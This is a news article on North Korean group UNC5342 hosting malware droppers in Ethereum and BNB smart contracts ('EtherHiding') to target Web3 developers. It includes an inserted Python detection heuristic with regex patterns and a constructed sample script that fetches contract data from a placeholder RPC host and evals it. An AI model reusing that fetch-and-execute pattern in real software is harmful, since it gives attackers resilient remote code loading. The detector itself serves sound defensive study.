- UNC5342 uses blockchain smart contracts to deliver crypto-stealing malware via EtherHiding
- Fake jobs and coding challenges lure developers to trigger the JadeSnow loader and backdoor
- Blockchain’s immutability makes malware hosting resilient
North Korean state-sponsored threat actors are now using public blockchains to host malicious code and deploy malware on target endpoints.
This is according to Google’s Threat Intelligence Group (GTIG), which said it observed UNC5342 using Ethereum and BNB to host droppers and ultimately deploy cryptocurrency-stealing malware against software and blockchain developers.
The technique is called EtherHiding. Instead of sending a malicious file directly to the victim (or otherwise tricking them into downloading it), they encode parts of the malware into blockchain transactions and smart contracts.
Development of bulletproof hosting
The smart contract itself does not automatically execute malware on someone else’s computer, but it can deliver instructions or code when a user interacts with it (when they click a link, run a script, or connect a crypto wallet).
From an attacker’s perspective, a blockchain is an attractive place to store and distribute malware: it is public, immutable and almost impossible to manipulate.
“This represents a shift towards next-generation bulletproof hosting,” Google said, stressing that blockchain’s resilient nature is what makes it so alluring to cybercriminals.
Starting in February, UNC5342 was observed creating fake jobs and coding challenges, tricking developers and others working in the Web3 space into downloading various files. These files connect to the blockchain and retrieve the code, which in turn installs the JadeSnow loader. This loader drops the InvisibleFerret backdoor, which was already observed being used in cryptocurrency thefts.
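A defender-side check for the pattern described above, added here as an example and not taken from Google’s report: a heuristic that flags JavaScript which reads data from a chain and then decodes or executes what comes back. The indicator patterns, the endpoint keywords and the two sample scripts are constructed for this example.

```python
import re

# Heuristics for the EtherHiding pattern: a script reads a payload from a
# smart contract (a read-only call, so no transaction is needed) and then
# executes it dynamically. Patterns are constructed for this example and
# are not a published detection rule.
RPC_READ = re.compile(r"\b(eth_call|eth_getStorageAt|eth_getTransactionByHash)\b"
                      r"|\.methods\.\w+\([^)]*\)\.call\b|readContract")
DYNAMIC_EXEC = re.compile(r"\beval\s*\(|new\s+Function\s*\(|setTimeout\s*\(\s*[\"']"
                          r"|document\.write\s*\(")
HEX_DECODE = re.compile(r"hexToUtf8|hexToAscii|toUtf8String|fromCharCode"
                        r"|parseInt\([^)]*,\s*16\)|atob\s*\(")
RPC_ENDPOINT = re.compile(r"https?://[\w.-]*(bsc|bnb|binance|ethereum|infura|alchemy)[\w./-]*", re.I)

def score_script(src: str) -> dict:
    """Return which indicators fired and a verdict for one JavaScript source."""
    hits = {
        "chain_read": bool(RPC_READ.search(src)),
        "dynamic_exec": bool(DYNAMIC_EXEC.search(src)),
        "payload_decode": bool(HEX_DECODE.search(src)),
        "public_rpc": bool(RPC_ENDPOINT.search(src)),
    }
    # A chain read alone is what any dApp does; the combination with
    # decoding and executing the returned bytes is what matters.
    if hits["chain_read"] and hits["dynamic_exec"]:
        verdict = "suspicious"
    elif hits["chain_read"] and hits["payload_decode"]:
        verdict = "review"
    else:
        verdict = "benign"
    return {"verdict": verdict, **hits}

# Constructed samples: a normal dApp balance check, and the shape of a script
# that pulls bytes from a contract and runs them (placeholders, no payload).
BENIGN_DAPP = """
const bal = await contract.methods.balanceOf(addr).call();
document.getElementById('bal').innerText = web3.utils.fromWei(bal);
"""
SUSPICIOUS = """
const r = await fetch('https://bsc-rpc.example/', {method:'POST',
  body: JSON.stringify({jsonrpc:'2.0',method:'eth_call',params:[{to:C,data:D},'latest'],id:1})});
const hex = (await r.json()).result;
eval(web3.utils.hexToUtf8(hex));
"""

if __name__ == "__main__":
    for name, src in (("benign", BENIGN_DAPP), ("suspicious", SUSPICIOUS)):
        print(name, score_script(src))
```

The "review" tier catches scripts that decode contract output without an obvious exec call, which is where a loader that stages the next step through a second fetch would land.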
This isn’t the first time we’ve seen blockchain being used to deliver malware. The technique has been in use since 2023, and in the same report Google also mentioned a financially motivated actor, UNC5142, using the same technique.
This group was seen compromising WordPress websites to host malicious JavaScript code that was connected to the blockchain. More than 14,000 infected sites have been found so far.
North Korea is known for attacking the crypto industry and using the stolen funds to fund its weapons program and state apparatus.
Via The Record